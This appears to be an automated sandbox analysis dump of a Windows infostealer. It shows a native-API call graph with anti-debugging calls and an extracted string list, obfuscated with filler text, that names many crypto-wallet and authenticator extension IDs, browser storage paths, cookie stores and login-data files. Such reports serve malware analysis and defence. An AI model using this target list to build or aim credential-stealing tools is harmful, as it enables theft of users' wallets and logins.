73726->73729 73727->73729 73728 40d994 155 API calls 73728->73729 73729->73717 73729->73719 73729->73720 73729->73723 73729->73724 73729->73725 73729->73726 73729->73728 73737 40b129 73729->73737 73749 438e28 73729->73749 73757 419e6b 73729->73757 73730->73715 73731->73715 73732->73715 73733->73715 73734->73715 73735->73715 73736->73703 73738 40b13c __CreateFrameInfo 73737->73738 73739 40b494 73738->73739 73740 40a928 41 API calls 73738->73740 73741 40b759 NtReadFile 73738->73741 73742 40b81c 41 API calls 73738->73742 73743 438e28 LoadLibraryW GetPEB lstrcmpiW 73738->73743 73745 40b129 41 API calls 73738->73745 73748 447e24 15 API calls ___std_exception_copy 73738->73748 73765 40b7bb 73738->73765 73740->73738 73744 438e28 3 API calls 73741->73744 73742->73738 73743->73738 73746 40b7ab NtClose 73744->73746 73745->73738 73746->73729 73748->73738 73755 438e45 73749->73755 73750 43935b LoadLibraryW 73750->73755 73751 43a4fe GetPEB lstrcmpiW 73751->73755 73752 439535 GetPEB lstrcmpiW 73752->73755 73753 438e28 GetPEB lstrcmpiW 73753->73755 73754 43b362 GetPEB lstrcmpiW 73754->73755 73755->73750 73755->73751 73755->73752 73755->73753 73755->73754 73756 439136 73755->73756 73756->73729 73760 419e88 73757->73760 73761 41a1d4 73760->73761 73821 418b8f 73760->73821 73824 41831a 119 API calls _wctomb_s 73760->73824 73825 419496 106 API calls 3 library calls 73760->73825 73826 4137c1 16 API calls 2 library calls 73760->73826 73827 41900a 46 API calls 2 library calls 73760->73827 73761->73729 73761->73761 73771 40a928 73765->73771 73767 40b812 73767->73738 73768 40b7ca 73768->73767 73768->73768 73769 438e28 3 API calls 73768->73769 73770 40b807 NtClose 73769->73770 73770->73767 73772 40a941 __CreateFrameInfo 73771->73772 73773 438e28 3 API calls 73772->73773 73775 40a956 __CreateFrameInfo 73773->73775 73774 40b02e lstrcatW lstrlenW 73774->73775 73775->73774 73776 40ac51 lstrlenW 73775->73776 73777 40acba lstrcatW 73775->73777 73778 438e28 3 API calls 73775->73778 73780 40ae4c 
73775->73780 73781 40a928 38 API calls 73775->73781 73782 40af6b NtCreateFile 73775->73782 73784 40b129 38 API calls 73775->73784 73785 40b7bb 38 API calls 73775->73785 73786 40b81c 73775->73786 73776->73775 73777->73775 73778->73775 73780->73768 73780->73780 73781->73775 73783 438e28 3 API calls 73782->73783 73783->73775 73784->73775 73785->73775 73811 40b835 __fread_nolock __CreateFrameInfo 73786->73811 73787 40d120 NtQueryDirectoryFile 73787->73811 73788 40d6a1 lstrcmpW 73788->73811 73789 40d7fe lstrlenW 73789->73811 73790 40d817 lstrlenW 73790->73811 73791 40d3c0 lstrcmpW 73791->73811 73792 40d891 lstrcmpW 73792->73811 73793 40c3a9 lstrcmpW 73793->73811 73794 40d352 73794->73775 73794->73794 73795 40b81c 26 API calls 73795->73811 73796 40c57e lstrlenW 73796->73811 73797 438e28 3 API calls 73804 40d547 NtClose 73797->73804 73798 438e28 LoadLibraryW GetPEB lstrcmpiW 73798->73811 73799 40cc06 lstrcatW lstrcatW 73799->73811 73800 40c8cc lstrcmpW 73800->73811 73801 40c8fe lstrlenW 73801->73811 73802 40cdde lstrcatW 73802->73811 73803 438e28 3 API calls 73808 40cced NtCreateFile 73803->73808 73804->73811 73805 40a928 26 API calls 73805->73811 73807 40b7bb 26 API calls 73807->73811 73808->73811 73809 40c415 lstrcatW lstrcatW 73809->73811 73810 40b129 26 API calls 73810->73811 73811->73787 73811->73788 73811->73789 73811->73790 73811->73791 73811->73792 73811->73793 73811->73794 73811->73795 73811->73796 73811->73797 73811->73798 73811->73799 73811->73800 73811->73801 73811->73802 73811->73803 73811->73805 73811->73807 73811->73809 73811->73810 73812 447e24 73811->73812 73817 44eb6f _unexpected 73812->73817 73813 44ebad 73820 4447a4 14 API calls __dosmaperr 73813->73820 73815 44eb98 RtlAllocateHeap 73816 44ebab 73815->73816 73815->73817 73816->73811 73817->73813 73817->73815 73819 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 73817->73819 73819->73817 73820->73816 73828 418ba2 73821->73828 73823 418b9e 73823->73760 73824->73760 73825->73760 73826->73760 
73827->73760 73829 418bb9 _strlen 73828->73829 73840 418c73 73828->73840 73830 447a80 ___std_exception_destroy 14 API calls 73829->73830 73831 418bfe 73829->73831 73829->73840 73830->73831 73832 418c33 73831->73832 73835 418cf3 73831->73835 73831->73840 73839 418c68 73832->73839 73846 415039 46 API calls 73832->73846 73834 447a80 ___std_exception_destroy 14 API calls 73834->73840 73835->73839 73841 44614f GetSystemTimeAsFileTime 73835->73841 73837 418e08 73843 417099 73837->73843 73839->73834 73839->73840 73840->73823 73842 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 73841->73842 73842->73837 73847 44575f 73843->73847 73845 4170be 73845->73839 73846->73839 73848 44576a 73847->73848 73849 44578d 73848->73849 73850 44577a 73848->73850 73852 44579f 73849->73852 73861 4457b2 73849->73861 73893 4447a4 14 API calls __dosmaperr 73850->73893 73895 4447a4 14 API calls __dosmaperr 73852->73895 73853 44577f 73894 44e2f7 29 API calls __fread_nolock 73853->73894 73855 4457a4 73896 44e2f7 29 API calls __fread_nolock 73855->73896 73856 4457d2 73897 4447a4 14 API calls __dosmaperr 73856->73897 73857 4457e3 73885 453aae 73857->73885 73861->73856 73861->73857 73865 4457fa 73866 4459ee 73865->73866 73905 45373d 73865->73905 73924 44e307 11 API calls CallUnexpected 73866->73924 73869 4459f8 73870 44580c 73870->73866 73912 453769 73870->73912 73872 44581e 73872->73866 73873 445827 73872->73873 73874 4458ac 73873->73874 73876 445848 73873->73876 73922 4537d0 29 API calls 3 library calls 73874->73922 73919 4537d0 29 API calls 3 library calls 73876->73919 73877 4458b3 73883 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 73877->73883 73923 453a5a 29 API calls 2 library calls 73877->73923 73879 445860 73879->73883 73920 453a5a 29 API calls 2 library calls 73879->73920 73882 445879 73882->73883 73921 4537d0 29 API calls 3 library calls 73882->73921 73883->73845 73886 453aba ___scrt_is_nonwritable_in_current_image 73885->73886 73887 4457e8 73886->73887 73925 44d13d 
EnterCriticalSection 73886->73925 73898 453711 73887->73898 73889 453acb 73890 453adf 73889->73890 73926 453ff7 73889->73926 73938 453b02 LeaveCriticalSection CallUnexpected 73890->73938 73893->73853 73894->73883 73895->73855 73896->73883 73897->73883 73899 453732 73898->73899 73900 45371d 73898->73900 73899->73865 74001 4447a4 14 API calls __dosmaperr 73900->74001 73902 453722 74002 44e2f7 29 API calls __fread_nolock 73902->74002 73904 45372d 73904->73865 73906 45375e 73905->73906 73907 453749 73905->73907 73906->73870 74003 4447a4 14 API calls __dosmaperr 73907->74003 73909 45374e 74004 44e2f7 29 API calls __fread_nolock 73909->74004 73911 453759 73911->73870 73913 453775 73912->73913 73914 45378a 73912->73914 74005 4447a4 14 API calls __dosmaperr 73913->74005 73914->73872 73916 45377a 74006 44e2f7 29 API calls __fread_nolock 73916->74006 73918 453785 73918->73872 73919->73879 73920->73882 73921->73883 73922->73877 73923->73883 73924->73869 73925->73889 73939 453b0b 73926->73939 73929 454053 73957 453bc4 73929->73957 73930 45404a 73951 453d65 73930->73951 73933 454050 73934 44e224 ___free_lconv_mon 14 API calls 73933->73934 73935 45405e 73934->73935 73980 43d298 5 API calls ___raise_securityfailure 73935->73980 73937 45406b 73937->73890 73938->73887 73981 45af54 73939->73981 73942 453b31 73942->73929 73942->73930 73945 45af54 42 API calls 73947 453b6a 73945->73947 73946 44e224 ___free_lconv_mon 14 API calls 73946->73942 73948 453b74 73947->73948 73949 453b52 73947->73949 73950 44e224 ___free_lconv_mon 14 API calls 73948->73950 73949->73946 73950->73942 73952 453d75 73951->73952 73953 453769 29 API calls 73952->73953 73954 453d96 73953->73954 73996 44e307 11 API calls CallUnexpected 73954->73996 73956 453ff6 73958 453bd4 73957->73958 73959 453769 29 API calls 73958->73959 73960 453bf1 73959->73960 73961 453d13 73960->73961 73962 453711 29 API calls 73960->73962 74000 44e307 11 API calls CallUnexpected 73961->74000 73964 453c03 73962->73964 73964->73961 73966 
45373d 29 API calls 73964->73966 73965 453d1d 73967 453c15 73966->73967 73967->73961 73968 453c1e 73967->73968 73969 44e224 ___free_lconv_mon 14 API calls 73968->73969 73970 453c29 GetTimeZoneInformation 73969->73970 73971 453c45 73970->73971 73972 453cf0 73970->73972 73973 453c79 __fread_nolock 73971->73973 73972->73933 73997 4512d8 41 API calls 2 library calls 73973->73997 73975 453cc8 73998 453b82 43 API calls 3 library calls 73975->73998 73977 453cd9 73999 453b82 43 API calls 3 library calls 73977->73999 73979 453ced 73979->73972 73980->73937 73982 45af5f ___scrt_is_nonwritable_in_current_image 73981->73982 73983 44d13d CallUnexpected EnterCriticalSection 73982->73983 73984 45af76 73983->73984 73985 45b042 42 API calls 73984->73985 73986 45af8c 73985->73986 73987 45afb5 LeaveCriticalSection 73986->73987 73988 453b2a 73987->73988 73988->73942 73989 44eb6f 73988->73989 73990 44ebad 73989->73990 73994 44eb7d _unexpected 73989->73994 73991 4447a4 __dosmaperr 14 API calls 73990->73991 73993 44ebab 73991->73993 73992 44eb98 RtlAllocateHeap 73992->73993 73992->73994 73993->73945 73993->73949 73994->73990 73994->73992 73995 44e560 _unexpected EnterCriticalSection LeaveCriticalSection 73994->73995 73995->73994 73996->73956 73997->73975 73998->73977 73999->73979 74000->73965 74001->73902 74002->73904 74003->73909 74004->73911 74005->73916 74006->73918 74007 43c910 74008 43c91c ___scrt_is_nonwritable_in_current_image 74007->74008 74033 43cbbb 74008->74033 74010 43c923 74011 43ca76 74010->74011 74022 43c94d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 74010->74022 74056 43ce95 4 API calls 2 library calls 74011->74056 74013 43ca7d 74049 443854 74013->74049 74017 43ca8b 74018 43c96c 74019 43c9ed 74041 43ce0e GetStartupInfoW __fread_nolock 74019->74041 74021 43c9f3 74042 42f1a8 74021->74042 74022->74018 74022->74019 74052 44389e 41 API calls 3 library calls 74022->74052 74027 43ca0f 74027->74013 74028 43ca13 74027->74028 74029 43ca1c 
74028->74029 74054 443880 23 API calls CallUnexpected 74028->74054 74055 43cbf4 77 API calls ___scrt_uninitialize_crt 74029->74055 74032 43ca24 74032->74018 74034 43cbc4 74033->74034 74058 43d0b8 IsProcessorFeaturePresent 74034->74058 74036 43cbd0 74059 43d5c2 10 API calls 2 library calls 74036->74059 74038 43cbd5 74039 43cbd9 74038->74039 74060 43d5e1 7 API calls 2 library calls 74038->74060 74039->74010 74041->74021 74043 42f1ad 74042->74043 74061 4245ec 74043->74061 74070 4244e4 GetPEB 74043->74070 74074 42d658 74043->74074 74099 422177 74043->74099 74044 42f1bd 74053 43ce3f GetModuleHandleW 74044->74053 74470 443a0a 74049->74470 74052->74019 74053->74027 74054->74029 74055->74032 74056->74013 74057 44386a 23 API calls CallUnexpected 74057->74017 74058->74036 74059->74038 74060->74039 74062 424605 74061->74062 74063 4247ff NtQuerySystemInformation 74062->74063 74064 4224a3 GetPEB NtQueryInformationProcess GetPEB 74062->74064 74065 4247b0 GetPEB 74062->74065 74068 424980 74062->74068 74069 422177 56 API calls 74062->74069 74107 4279e0 74062->74107 74111 4262a1 74062->74111 74063->74062 74064->74062 74065->74062 74068->74044 74069->74062 74071 424502 74070->74071 74072 4279e0 GetPEB 74071->74072 74073 4245d2 NtSetInformationThread 74071->74073 74072->74071 74073->74044 74096 42d66d 74074->74096 74075 422177 58 API calls 74075->74096 74076 42f19d 74076->74044 74080 4269e4 GetPEB GetPEB 74080->74096 74081 4262a1 58 API calls 74081->74096 74082 42f1c2 GetPEB NtClose GetPEB 74082->74096 74084 4244e4 3 API calls 74084->74096 74085 42d658 281 API calls 74085->74096 74087 42f265 GetPEB 74087->74096 74089 4245ec 58 API calls 74089->74096 74091 40e14e 161 API calls 74091->74096 74094 41a28f 182 API calls 74094->74096 74095 419b9d 72 API calls 74095->74096 74096->74075 74096->74076 74096->74080 74096->74081 74096->74082 74096->74084 74096->74085 74096->74087 74096->74089 74096->74091 74096->74094 74096->74095 74098 4360e1 15 API calls 74096->74098 74197 402fcc LoadLibraryA 
LoadLibraryA 74096->74197 74207 401ff9 74096->74207 74218 402476 74096->74218 74231 430228 74096->74231 74244 436adc 74096->74244 74261 434080 74096->74261 74277 433c10 74096->74277 74287 421eeb 74096->74287 74293 4224a3 74096->74293 74299 42cfba 74096->74299 74098->74096 74101 422191 74099->74101 74100 422398 NtQueryInformationProcess 74100->74101 74101->74100 74102 42245b GetPEB 74101->74102 74103 4279e0 GetPEB 74101->74103 74106 422491 74101->74106 74468 41f916 GetPEB VirtualQuery 74101->74468 74469 41ebeb 58 API calls 74101->74469 74102->74101 74103->74101 74106->74044 74108 4279fe 74107->74108 74110 428317 74108->74110 74128 428334 GetPEB 74108->74128 74110->74062 74125 4262bc __fread_nolock 74111->74125 74112 426847 RtlAdjustPrivilege 74116 4279e0 GetPEB 74112->74116 74113 426972 74124 422177 55 API calls 74113->74124 74113->74125 74169 424c44 GetModuleFileNameW CreateFileW CloseHandle 74113->74169 74114 4279e0 GetPEB 74114->74125 74115 426600 GetPEB 74115->74125 74116->74125 74118 4269dc 74118->74062 74120 4263c1 LoadLibraryA 74120->74125 74122 422817 17 API calls 74122->74125 74124->74113 74125->74112 74125->74113 74125->74114 74125->74115 74125->74118 74125->74120 74125->74122 74126 4244e4 3 API calls 74125->74126 74129 41f9a4 74125->74129 74166 41eb3f RaiseException 74125->74166 74167 424995 20 API calls 2 library calls 74125->74167 74168 426a42 GetPEB GetPEB 74125->74168 74126->74125 74128->74108 74163 41f9bc 74129->74163 74130 421bb3 NtQuerySystemInformation 74130->74163 74131 421bff NtQuerySystemInformation 74131->74163 74132 42162a GetProcessId 74132->74163 74134 422817 17 API calls 74134->74163 74135 4262a1 51 API calls 74135->74163 74136 4245ec 51 API calls 74136->74163 74137 424b24 GetPEB HeapDestroy 74137->74163 74139 420e2d NtClose 74139->74163 74140 4228cf 51 API calls 74140->74163 74141 420a7a GetPEB 74141->74163 74142 4224a3 GetPEB NtQueryInformationProcess GetPEB 74142->74163 74143 421ee3 74143->74125 74145 4202ad GetCurrentProcessId 
74145->74163 74146 447a80 ___std_exception_destroy 14 API calls 74146->74163 74147 420593 NtDuplicateObject 74147->74163 74149 41f536 51 API calls 74149->74163 74150 447e24 ___std_exception_copy 15 API calls 74150->74163 74153 421eeb NtQueryInformationProcess GetPEB GetPEB 74153->74163 74154 41f916 GetPEB VirtualQuery 74154->74163 74155 424995 20 API calls 74155->74163 74156 426a42 GetPEB GetPEB 74156->74163 74157 420bb6 74157->74163 74185 424c44 GetModuleFileNameW CreateFileW CloseHandle 74157->74185 74186 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 74157->74186 74187 4228cf 74157->74187 74158 4279e0 GetPEB 74158->74163 74160 4269e4 GetPEB GetPEB 74160->74163 74161 41f9a4 51 API calls 74161->74163 74162 422177 51 API calls 74162->74163 74163->74130 74163->74131 74163->74132 74163->74134 74163->74135 74163->74136 74163->74137 74163->74139 74163->74140 74163->74141 74163->74142 74163->74143 74163->74145 74163->74146 74163->74147 74163->74149 74163->74150 74163->74153 74163->74154 74163->74155 74163->74156 74163->74157 74163->74158 74163->74160 74163->74161 74163->74162 74164 4244e4 3 API calls 74163->74164 74170 44814e 74163->74170 74183 424c8d 58 API calls ___std_exception_copy 74163->74183 74184 41eb3f RaiseException 74163->74184 74192 41ebeb 58 API calls 74163->74192 74193 41e6f0 58 API calls 74163->74193 74164->74163 74166->74125 74167->74125 74169->74113 74171 45699f 74170->74171 74172 4569b7 74171->74172 74173 4569ac 74171->74173 74175 4569bf 74172->74175 74181 4569c8 _unexpected 74172->74181 74174 44eb6f __fread_nolock 15 API calls 74173->74174 74179 4569b4 74174->74179 74176 44e224 ___free_lconv_mon 14 API calls 74175->74176 74176->74179 74177 4569f2 RtlReAllocateHeap 74177->74179 74177->74181 74178 4569cd 74194 4447a4 14 API calls __dosmaperr 74178->74194 74179->74163 74181->74177 74181->74178 74195 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 74181->74195 74183->74163 74184->74163 74185->74157 74186->74157 74188 422958 
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                          • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                          • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                          • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                          Strings
                                                          • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                          • Au576xedthy, xrefs: 00406CF1
                                                          • W576xedeb Da576xedta, xrefs: 00408697
                                                          • Pol576xedymesh, xrefs: 004075AC
                                                          • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                          • Wom576xedbat, xrefs: 004077AD
                                                          • NeoL576xedine, xrefs: 00407CB2
                                                          • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                          • Nab576xedox, xrefs: 00408018
                                                          • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                          • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                          • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                          • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                          • Cy576xedano, xrefs: 00407AE5
                                                          • UL6T, xrefs: 0040702D
                                                          • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                          • VL6T, xrefs: 0040891C
                                                          • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                          • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                          • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                          • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                          • By576xedone, xrefs: 004076ED
                                                          • ME576xedW CX, xrefs: 004073DD
                                                          • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                          • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                          • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                          • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                          • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                          • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                          • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                          • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                          • /BrowserDB, xrefs: 00408A68
                                                          • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                          • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                          • Te576xedzBox, xrefs: 00407F84
                                                          • EQ576xedUAL, xrefs: 004076A5
                                                          • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                          • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                          • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                          • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                          • ICO576xedNex, xrefs: 004075D4
                                                          • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                          • Gu576xedild, xrefs: 004081EB
                                                          • Au576xedro, xrefs: 00407584
                                                          • Coi576xedn98, xrefs: 00407492
                                                          • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                          • EnK576xedrypt, xrefs: 00408897
                                                          • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                          • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                          • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                          • Zi576xedlPay, xrefs: 0040746A
                                                          • Ma576xedth, xrefs: 004083D3
                                                          • Coinb576xedase, xrefs: 004083FB
                                                          • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                          • Hist576xedory, xrefs: 0040867F
                                                          • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                          • Ke576xedplr, xrefs: 004084A0
                                                          • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                          • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                          • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                          • Tro576xednLi576xednk, xrefs: 00407616
                                                          • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                          • His576xedtory, xrefs: 004083AF
                                                          • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                          • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                          • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                          • Pha576xedntom, xrefs: 0040822F
                                                          • Uni576xedSat, xrefs: 004082D2
                                                          • One576xedKey, xrefs: 00407859
                                                          • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                          • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                          • Gua576xedrda, xrefs: 00408423
                                                          • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                          • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                          • iW576xedlt, xrefs: 0040886F
                                                          • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                          • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                          • Sa576xedturn, xrefs: 00407C8A
                                                          • VL6T, xrefs: 004076C1
                                                          • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                          • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                          • Bit576xedApp, xrefs: 00408847
                                                          • Ni576xedfty, xrefs: 0040816B
                                                          • EeS, xrefs: 00406B7F
                                                          • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                          • Liqu576xedality, xrefs: 00407EDD
                                                          • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                          • Cl576xedover, xrefs: 004087AC
                                                          • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                          • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                          • Te576xedmple, xrefs: 00408068
                                                          • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                          • Le576xedaf, xrefs: 00407881
                                                          • KH576xedC, xrefs: 00408040
                                                          • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                          • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                          • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                          • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                          • EeS, xrefs: 00407043
                                                          • DAp576xedpPlay, xrefs: 00407FAC
                                                          • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                          • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                          • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                          • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                          • Bi576xedtClip, xrefs: 00407FD4
                                                          • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                          • Sol576xedlet, xrefs: 004088F4
                                                          • \Local Storage\leveldb, xrefs: 00406AFE
                                                          • Yo576xedroi, xrefs: 00408143
                                                          • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                          • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                          • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local 
Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xede
cifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                          • API String ID: 4038537762-1377293222
                                                          • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                          • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                          • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
